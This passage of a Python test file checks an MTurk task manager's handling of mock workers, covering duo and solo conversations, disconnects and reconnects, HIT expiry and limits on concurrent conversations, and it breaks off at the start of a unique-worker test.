test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Simulate a refresh, msg callback will verify it was valid
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(4, mturk_manager)
assert refresh_was_valid, 'Information sent on refresh was invalid'
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_VALID_RECONNECT_TEST] = True
def test_duo_one_disconnect(opt, server_url):
"""Tests whether disconnects properly cause a task to fail and let the
non-disconnecting partner complete the HIT. Also tests reconnecting after
a partner disconnect or after a disconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_ONE_DISCONNECT_TEST))
opt['task'] = DUO_ONE_DISCONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONE_DISCONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONE_DISCONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
partner_disconnects = 0
self_disconnects = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
MTURK_DISCONNECT_MESSAGE
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_1.conversation_id is not None and \
test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal partner_disconnects
nonlocal self_disconnects
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_INACTIVE_DONE:
partner_disconnects += 1
elif packet.data['text'] == data_model.COMMAND_INACTIVE_HIT:
self_disconnects += 1
elif test_agent_2.conversation_id is not None and \
test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2.5, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2.5, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
mturk_first_agent = None
mturk_second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
mturk_first_agent = mturk_manager_assign_1
mturk_second_agent = mturk_manager_assign_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
mturk_second_agent = mturk_manager_assign_1
mturk_first_agent = mturk_manager_assign_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
# Disconnect the first agent
first_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert partner_disconnects == 1, \
'Connected agent did not recieve an inactive_done command'
# Refresh the second agent
second_agent.conversation_id = None
second_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert partner_disconnects == 2, \
'Reconnected agent did not recieve an inactive_done command'
# Refresh the first agent
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert self_disconnects == 1, \
'Disconnected agent did not recieve an inactive command'
# Disconnect the second agent
second_agent.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(mturk_second_agent.state.status,
AssignState.STATUS_PARTNER_DISCONNECT)
check_status(mturk_first_agent.state.status,
AssignState.STATUS_DISCONNECT)
assert mturk_manager.completed_conversations == 0, \
'Incomplete conversation marked as complete'
assert mturk_second_agent.disconnected == False, \
'MTurk manager improperly marked the connected agent as disconnected'
assert mturk_first_agent.disconnected == True, \
'MTurk did not mark the disconnected agent as so'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
completed_threads[DUO_ONE_DISCONNECT_TEST] = True
def test_count_complete(opt, server_url):
"""Starts two worlds even though only one is requested by using the
count_complete flag.
"""
global completed_threads
print('{} Starting'.format(COUNT_COMPLETE_TEST))
opt['task'] = COUNT_COMPLETE_TEST
opt['count_complete'] = True
opt['num_conversations'] = 1
hit_id = FAKE_HIT_ID.format(COUNT_COMPLETE_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 2)
last_command = None
message_num_1 = 0
message_num_2 = 0
expected_messages = [TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback_1(packet):
nonlocal last_command
nonlocal message_num_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_1], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_1],
message_num_1,
packet.data['text']
)
message_num_1 += 1
test_agent_1 = \
MockAgent(opt, hit_id, assign_id_1, worker_id_1, task_group_id)
message_handler = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Run through onboarding
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_1.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
# Start the second agent while the first is still waiting
def msg_callback_2(packet):
nonlocal last_command
nonlocal message_num_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_2], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_2],
message_num_2,
packet.data['text']
)
message_num_2 += 1
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id_2, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Run through onboarding
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
# Finish agent 1's task
test_agent_1.send_message('Hello2', dummy)
test_agent_1.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
# Wait for both to disconnect
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert len(assign_state_1.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert len(assign_state_2.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager.started_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert mturk_manager.completed_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert message_num_1 == 2, 'Not all messages were successfully processed'
assert message_num_2 == 2, 'Not all messages were successfully processed'
completed_threads[COUNT_COMPLETE_TEST] = True
pass
def test_expire_hit(opt, server_url):
"""Tests force_expire_hit by creating 4 workers, leaving
one in onboarding and sending 3 to waiting, then ensuring that the
remaining waiting worker gets expired"""
global completed_threads
print('{} Starting'.format(EXPIRE_HIT_TEST))
opt['task'] = EXPIRE_HIT_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(EXPIRE_HIT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
last_command_3 = None
last_command_4 = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_3 = packet
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal last_command_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_4 = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
test_agent_3.wait_for_alive()
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_3, mturk_manager)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
check_new_agent_setup(test_agent_4, mturk_manager)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
# Run agent_3 through onboarding
assert test_agent_3.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_3.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_ONBOARDING)
test_agent_3.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(5, mturk_manager)
# Assert that the two other agents were expired
check_status(assign_state_3.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_4.status, AssignState.STATUS_EXPIRED)
assert last_command_3.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Waiting world agent was not expired'
assert last_command_4.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Onboarding world agent was not expired'
test_agent_3.always_beat = False
test_agent_4.always_beat = False
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_4.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.hit_is_expired == True, \
'MTurk manager failed to mark agent as expired'
assert mturk_manager_assign_4.hit_is_expired == True, \
'MTurk manager failed to mark agent as expired'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_4), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[EXPIRE_HIT_TEST] = True
def test_allowed_conversations(opt, server_url):
"""Test to ensure that an agent can't take part in two conversations at
the same time when only one concurrent conversation is allowed, but that
they're allowed to start it after finishing the first
"""
global completed_threads
print('{} Starting'.format(ALLOWED_CONVERSATION_TEST))
opt['allowed_conversations'] = 1
opt['num_conversations'] = 2
opt['task'] = ALLOWED_CONVERSATION_TEST
hit_id = FAKE_HIT_ID.format(ALLOWED_CONVERSATION_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 2)
worker_id = FAKE_WORKER_ID.format(ALLOWED_CONVERSATION_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state.messages))
# Try to connect to second conversation
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when connected'
# Finish first conversation
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
# Retry second conversation
last_command = None
message_num = 0
test_agent_2.send_alive()
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[ALLOWED_CONVERSATION_TEST] = True
def test_unique_workers_in_conversation(opt, server_url):
"""Ensures that a worker cannot start a conversation with themselves
when not in the sandbox
"""
global completed_threads
print('{} Starting'.format(UNIQUE_CONVERSATION_TEST))
opt['task'] = UNIQUE_CONVERSATION_TEST
opt['is_sandbox'] = False
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(UNIQUE_CONVERSATION_TEST)
worker_id_1 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 1)
worker_id_2 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 2)
